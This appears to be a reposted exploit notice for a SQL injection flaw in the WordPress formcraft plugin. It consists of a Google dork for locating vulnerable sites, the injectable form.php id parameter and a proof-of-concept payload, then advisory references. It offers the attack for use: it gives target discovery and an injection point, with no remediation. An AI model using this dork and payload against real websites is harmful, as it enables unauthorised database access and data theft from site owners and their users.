Wordpress formcraft插件注入

####################################################################### # Exploit Title : Wordpress formcraft Plugin Sql Injection # # Exploit Author : Ashiyane Digital Security Team # # Google Dork : inurl:/wp-content/plugins/formcraft # # Software Link : www.wordpress.org # # Tested on: Windows , Linux # # Date: 2013/12/2 # ############################################# # Exploit : Sql Injection # # Location1: [Target]/wp-content/plugins/formcraft/form.php?id=[Sql] # # # # Exploit-DB Note: # A PoC: form.php?id=1%20and%20 1=1 ########################################## ############## Milad Hacking We Love Mohammad ############## References: http://xforce.iss.net/xforce/xfdb/89581 http://www.securityfocus.com/bid/64183 http://www.exploit-db.com/exploits/30002 http://secunia.com/advisories/56044 http://packetstormsecurity.com/files/124343/wpformcraft-sql.txt

发表评论